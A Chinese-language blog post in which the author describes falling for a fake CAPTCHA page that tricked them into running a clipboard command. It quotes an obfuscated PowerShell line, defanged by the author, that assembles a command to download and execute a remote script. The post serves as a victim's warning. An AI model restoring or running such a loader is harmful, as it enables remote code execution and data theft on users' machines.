我刚刚遭受了一次伪验证码(Fake CAPTCHA)攻击

2026-02-04 16:30:18 0点赞 0收藏 0评论

我刚刚遭受了一次伪验证码(Fake CAPTCHA)攻击。

事情是这样的:早上我在搜一些东西、刷一些网页(懂的都懂得)。其中一个网页点完搜索后,弹出一个“我不是机器人”的页面。

图一,我不是机器人图一,我不是机器人

我顺手就点了。结果它弹出了一个新的画面,如图二所示。要求做一些进一步的操作来验明我不是机器人。

图二, 进一步的验证步骤图二, 进一步的验证步骤

我一直很好奇这种点选框是如何验证我不是机器人的,更加好奇在这个AI时代,它是如何区分AI和正常人类的。在这种好奇心的作用下,我以为是这家公司有了什么新的手段来区分真实人类和AI。同时,也怪我的手太快了。在我心中的安全小人反应过来之前,我就完成以上三个快捷操作。

看到一个命令行窗口,一闪就关了,我心里马上意识到事情不对了。 然后把剪切板里的内容复制到记事本里仔细一看,就知道糟了!

以下是剪切板里的部分内容,同时我把所有的E都替换成了1,以避免有人从这里粘贴、复制、执行。

powershell.exe -WIndOwS mIniMIzE $jX='WdifcwG1TrqriPmGxmri.N1TWORkJvxKSxQP';$Nzz=($jX.Substring(16,12));$FeZ=.($jX[((-46)-(-65))]+$jX[26]+$jX[14]) $Nzz;$VudW=$FeZ; .($VudW.Remove(0,3).Remove(3))($VudW);

使用AI对这个文字进行分析,它其实是从 $jX 这个字符串里提取了各个字符,组成了一个命令:“IEX WebRequest(...)” 去某一个网站下载了一个脚本来执行。

图三, AI对命令的分析图三, AI对命令的分析

从执行恶意命令,意识到有问题,到确认这是一次攻击,我大约花了1分钟时间。接下来就是断网、备份必要的文件 和 重装系统。我还不确认我在这一分钟时间里到底损失了多少东西: 浏览器里的密码理论上是需要摄像头验证才能读取的; 照片、视频文件也许会失窃一些;工作内容这台机器上没有哈!

现在主流网站都会有手机或短信的二次验证,目前也没有看到有任何攻击者尝试的迹象。但愿这次被攻击的损失就局限在我重装系统的时间损失吧。

作者声明本文无利益相关,欢迎值友理性交流,和谐讨论~

展开 收起
0评论

当前文章无评论,是时候发表评论了
提示信息

取消
确认
评论举报

相关文章推荐

更多精彩文章
更多精彩文章
最新文章 热门文章
0
扫一下,分享更方便,购买更轻松